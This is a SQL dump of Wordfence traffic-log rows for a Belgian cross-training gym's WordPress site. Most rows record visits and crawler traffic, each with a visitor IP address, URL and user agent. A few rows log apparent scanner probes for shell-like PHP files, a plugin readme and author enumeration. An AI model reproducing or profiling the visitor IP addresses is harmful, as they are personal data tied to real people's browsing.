(69211, 1491861174.828558, 1565815695, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/sketch/404.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(69212, 1491861402.284843, 1565815695, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/assets/images/version.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(69213, 1491878437.411432, 1570674729, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(69214, 1491878443.378667, 1123631646, 0, 0, 1, 0, 1, 'https://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69215, 1491878443.385409, 1570674758, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(69216, 1491878443.924206, 1123631646, 0, 1, 1, 0, 1, 'https://www.crosstrainingcenter.be/.well-known/apple-app-site-association', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69217, 1491886384.030226, 1123631639, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69218, 1491886384.451078, 1123631639, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69219, 1491886392.229563, 1160651783, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36'),
(69220, 1491887702.367039, 872366420, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(69221, 1491887735.970771, 96753435, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(69222, 1491887920.861438, 135738378, 0, 0, 0, 0, 0, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko'),
(69223, 1491888232.013776, 1123631816, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69224, 1491888233.200231, 1123631639, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69225, 1491889550.967256, 100662546, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(69226, 1491895348.135833, 2637637422, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69227, 1491895348.404144, 2637637422, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69228, 1491900185.914739, 2637637422, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69229, 1491903189.107511, 135738378, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko'),
(69230, 1491905670.042732, 1123631639, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69231, 1491909664.960739, 3475901709, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69232, 1491911994.340528, 1538729458, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=9&ved=0ahUKEwi3mLGJrZzTAhVHthoKHX5nCQYQFghrMAg&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2Fles-seances-namur%2F&usg=AFQjCNF3CZXOTpgEhukKBcCq_alqy9J0kw', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(69233, 1491911997.974365, 1538729458, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko'),
(69234, 1491912113.130754, 2521214253, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)'),
(69235, 1491912113.538207, 2521214217, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)'),
(69236, 1491913141.947648, 2521214219, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)'),
(69237, 1491916360.830475, 1123631693, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69238, 1491918000.944307, 3281698622, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),
(69239, 1491921497.656277, 3512711143, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', '=Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16'),
(69240, 1491931719.345696, 878096387, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'ia_archiver'),
(69241, 1491931720.288284, 878096387, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'ia_archiver'),
(69242, 1491933820.507663, 1538438226, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (iPad; CPU OS 10_2_1 like Mac OS X) AppleWebKit/602.4.6 (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1'),
(69243, 1491935069.364187, 3492536661, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(69244, 1491935072.875878, 3492536661, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(69245, 1491936848.265471, 3475901949, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69246, 1491941150.652880, 3103997920, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2700.13 Safari/537.36'),
(69247, 1491943528.159778, 1160651783, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36'),
(69248, 1491944929.692853, 2366145547, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(69249, 1491948523.972556, 3475901949, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69250, 1491948524.189954, 3475901949, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69251, 1491973972.493679, 1837912589, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Linux; Android 5.1.1; SM-G800F Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(69252, 1491973975.432001, 1837912589, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 5.1.1; SM-G800F Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(69253, 1491988747.118602, 3567663235, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjepKaYy57TAhXFSRoKHWuHDL0QFggdMAA&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2F&usg=AFQjCNFlnF2lMOWCGxV4AnRa451d2QSVkQ', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0'),
(69254, 1491988750.200487, 3567663235, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0'),
(69255, 1491988750.551198, 3567663235, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0'),
(69256, 1491988756.166071, 1160651783, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36'),
(69257, 1491992879.079744, 2499535434, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup.com/crawler.html)'),
(69258, 1491992880.469549, 2499535434, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup.com/crawler.html)'),
(69259, 1491992910.910024, 2499535434, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup.com/crawler.html)'),
(69260, 1491994896.267723, 1605828420, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(69261, 1491994898.862664, 1605828420, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(69262, 1491997082.818417, 2783005756, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),
(69263, 1491997087.732582, 2783005756, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),
(69264, 1492000863.816979, 3287437327, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://crosstrainingcenter.be/?author=1', 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7'),
(69265, 1492002658.242043, 872366345, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/hello-world/feed/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(69266, 1492012366.034463, 1123631630, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69267, 1492017323.391689, 1538608488, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-A300FU Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(69268, 1492017389.536200, 1538608488, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-A300FU Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(69269, 1492017391.934606, 1538608488, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-A300FU Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(69270, 1492017411.815904, 1538608488, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-A300FU Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(69271, 1492017540.697483, 1538608488, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-A300FU Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(69272, 1492017546.316422, 1538608488, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-A300FU Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(69273, 1492017565.958519, 1538608488, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-A300FU Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(69274, 1492017587.150111, 1538608488, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-A300FU Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(69275, 1492017597.572663, 1538608488, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-A300FU Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.132 Mobile Safari/537.36'),
(69276, 1492035126.373718, 3475901914, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69277, 1492036067.801137, 3024883488, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(69278, 1492039086.735743, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69279, 1492052530.405802, 2996485381, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(69280, 1492052531.510512, 2366158866, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(69281, 1492054102.080892, 2996485408, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(69282, 1492054662.460512, 3103997920, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/simple-ads-manager/readme.txt', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2842.35 Safari/537.36'),
(69283, 1492057920.905369, 3024883490, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(69284, 1492058761.368905, 16886417, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(69285, 1492058767.429728, 1160651783, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36'),
(69286, 1492061916.917864, 1123635120, 0, 0, 1, 0, 1, 'https://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69287, 1492061917.474618, 1123635120, 0, 1, 1, 0, 1, 'https://www.crosstrainingcenter.be/.well-known/apple-app-site-association', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69288, 1492064645.508590, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69289, 1492065389.515769, 3652617281, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(69290, 1492065395.848269, 96753435, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(69291, 1492066474.669148, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69292, 1492066475.307445, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69293, 1492066630.243236, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69294, 1492066842.083443, 856623645, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/up.php', 'http://www.crosstrainingcenter.be/up.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(69295, 1492066958.756315, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69296, 1492068251.716195, 3567663235, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiPmoGv86DTAhVFIcAKHdT7BxQQFggdMAA&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2F&usg=AFQjCNFlnF2lMOWCGxV4AnRa451d2QSVkQ', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0'),
(69297, 1492068255.442781, 3567663235, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0'),
(69298, 1492068255.848553, 3567663235, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0'),
(69299, 1492070407.855833, 786801762, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; SemrushBot/1.2~bl; +http://www.semrush.com/bot.html)'),
(69300, 1492072397.043373, 3475901902, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(69301, 1492072405.410314, 1160651783, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36'),
(69302, 1492075309.683218, 3567655745, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36');
INSERT INTO `www2_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(69303, 1492075310.864453, 3567655745, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/266-2/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(69304, 1492075314.780113, 3567655745, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/266-2/', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),
(69305, 1492075612.012004, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69306, 1492076231.451671, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69307, 1492078559.213517, 878096387, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'ia_archiver'),
(69308, 1492078560.190563, 878096387, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', '', 'ia_archiver'),
(69309, 1492081708.768621, 1123635016, 0, 0, 1, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69310, 1492081710.001426, 1123635091, 0, 0, 1, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69311, 1492086870.358766, 1838116183, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-A310F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36'),
(69312, 1492086873.267781, 1838116183, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-A310F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36'),
(69313, 1492086925.350797, 1123635091, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(69314, 1492091269.139388, 1570674758, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(69315, 1492091272.299109, 2996485408, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(69316, 1492101450.160980, 90615111, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MojeekBot/0.6; +https://www.mojeek.com/bot.html)'),
(69317, 1492103966.014631, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(69318, 1492103970.317560, 3492536660, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; SiteExplorer/1.1b; +http://siteexplorer.info/Backlink-Checker-Spider/)'),
(69319, 1492108227.353175, 1160651783, 0, 0, 0, 0, 1, 'https://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36'),
(69320, 1492108656.234407, 3024883467, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(69321, 1492109320.900318, 2733854909, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://www.majestic12.co.uk/bot.php?+)/Nutch-1.13'),
(69322, 1492112119.527861, 2733848028, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36/Nutch-1.13'),
(69323, 1492115828.606216, 1375113915, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&sqi=2&ved=0ahUKEwjB-f_LpKLTAhWTOsAKHco9DgEQFggrMAE&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2F&usg=AFQjCNFlnF2lMOWCGxV4AnRa451d2QSVkQ&bvm=bv.152180690,d.bGs', 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; MAPBJS; rv:11.0) like Gecko'),
(69324, 1492115833.637703, 1375113915, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; MAPBJS; rv:11.0) like Gecko'),
